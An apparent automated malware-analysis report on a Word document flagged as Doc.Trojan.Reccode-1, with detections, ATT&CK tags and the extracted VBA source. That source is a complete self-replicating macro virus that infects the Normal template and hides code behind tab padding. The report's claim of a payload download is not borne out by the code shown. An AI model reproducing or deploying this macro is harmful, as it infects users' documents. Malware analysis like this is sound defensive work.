MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to deobfuscate and execute code, likely to download and run a secondary payload. The ClamAV detection of 'Doc.Trojan.Reccode-1' further supports its malicious nature.
Heuristics (3)
- ClamAV: Doc.Trojan.Reccode-1 (severity: critical, rule: CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Trojan.Reccode-1
- VBA macros detected (severity: medium, 1 related finding, rule: OLE_VBA_MACROS). Document contains VBA macro code
- Document_Open macro (severity: high, rule: OLE_VBA_DOCOPEN). Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4660 bytes |

SHA-256: 9fba49eff5978058ae28a2024e0673f7e76afaf3e062962bb0fd4c7a6d9b44c3
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim NTmp As Object
Set NTmp = Normal.ThisDocument
Dim Adc As Object
Set Adc = Project.ThisDocument
Dim TDc As Object
Set TDc = ThisDocument
Set AC = Adc.VBProject.VBComponents(1).CodeModule
Set NC = NTmp.VBProject.VBComponents(1).CodeModule
Set TD = TDc.VBProject.VBComponents(1).CodeModule
NTmp.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
Adc.Variables("RecCode").Value = TD.Lines(1, TD.CountOfLines)
UnstealthA = "With ThisDo" & "cument.VBPr" & "oject." & "VBCompo" & "nents(1" & ").CodeModule: "
UnstealthB = ".DeleteL" & "ines 1" & ", .CountO" & "fLines: "
UnStealthC = ".InsertLin" & "es 1, T" & "hisDo" & "cument.Variab" & "les(1)" & ".Value: "
UnStealthD = "End With"
UnStealth = String(175, Chr(9)) & "If ShowVisualBasicEditor = True Then Exit Sub: " & UnstealthA & UnstealthB & UnStealthC & UnStealthD
NC.DeleteLines 1, NC.CountOfLines: NC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
AC.DeleteLines 1, AC.CountOfLines: AC.InsertLines 1, "Private Sub Document_Close" & Chr(13) & UnStealth & Chr(13) & "End Sub"
End Sub
' Processing file: /opt/analyzer/scan_staging/b2095bf0965b4098a9de21d300997fea.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5879 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' Dim
' VarDefn NTmp (As Object)
' Line #2:
' SetStmt
' Ld Normal
' MemLd ThisDocument
' Set NTmp
' Line #3:
' Dim
' VarDefn Adc (As Object)
' Line #4:
' SetStmt
' Ld Project
' MemLd ThisDocument
' Set Adc
' Line #5:
' Dim
' VarDefn TDc (As Object)
' Line #6:
' SetStmt
' Ld ThisDocument
' Set TDc
' Line #7:
' SetStmt
' LitDI2 0x0001
' Ld Adc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set AC
' Line #8:
' SetStmt
' LitDI2 0x0001
' Ld NTmp
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set NC
' Line #9:
' SetStmt
' LitDI2 0x0001
' Ld TDc
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set TD
' Line #10:
' LitDI2 0x0001
' Ld TD
' MemLd CountOfLines
' Ld TD
' ArgsMemLd Lines 0x0002
' LitStr 0x0007 "RecCode"
' Ld NTmp
' ArgsMemLd Variables 0x0001
' MemSt Value
' Line #11:
' LitDI2 0x0001
' Ld TD
' MemLd CountOfLines
' Ld TD
' ArgsMemLd Lines 0x0002
' LitStr 0x0007 "RecCode"
' Ld Adc
' ArgsMemLd Variables 0x0001
' MemSt Value
' Line #12:
' LitStr 0x000B "With ThisDo"
' LitStr 0x000B "cument.VBPr"
' Concat
' LitStr 0x0006 "oject."
' Concat
' LitStr 0x0007 "VBCompo"
' Concat
' LitStr 0x0007 "nents(1"
' Concat
' LitStr 0x000E ").CodeModule: "
' Concat
' St UnstealthA
' Line #13:
' LitStr 0x0008 ".DeleteL"
' LitStr 0x0006 "ines 1"
' Concat
' LitStr 0x0009 ", .CountO"
' Concat
' LitStr 0x0008 "fLines: "
' Concat
' St UnstealthB
' Line #14:
' LitStr 0x000A ".InsertLin"
' LitStr 0x0007 "es 1, T"
' Concat
' LitStr 0x0005 "hisDo"
' Concat
' LitStr 0x000D "cument.Variab"
' Concat
' LitStr 0x0006 "les(1)"
' Concat
' LitStr 0x0008 ".Value: "
' Concat
' St UnStealthC
' Line #15:
' LitStr 0x0008 "End With"
' St UnStealthD
' Line #16:
' LitDI2 0x00AF
' LitDI2 0x0009
' ArgsLd Chr 0x0001
' ArgsLd String$ 0x0002
' LitStr 0x002F "If ShowVisualBasicEditor = True Then Exit Sub: "
' Concat
' Ld UnstealthA
' Concat
' Ld UnstealthB
' Concat
' Ld UnStealthC
' Concat
' Ld UnStealthD
' Concat
' St UnStealth
' Line #17:
' LitDI2 0x0001
' Ld NC
' MemLd CountOfLines
' Ld NC
' ArgsMemCall DeleteLines 0x0002
' BoS 0x0000
' LitDI2 0x0001
' LitStr 0x001A "Private Sub Document_Close"
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Concat
' Ld UnStealth
' Co
... (truncated)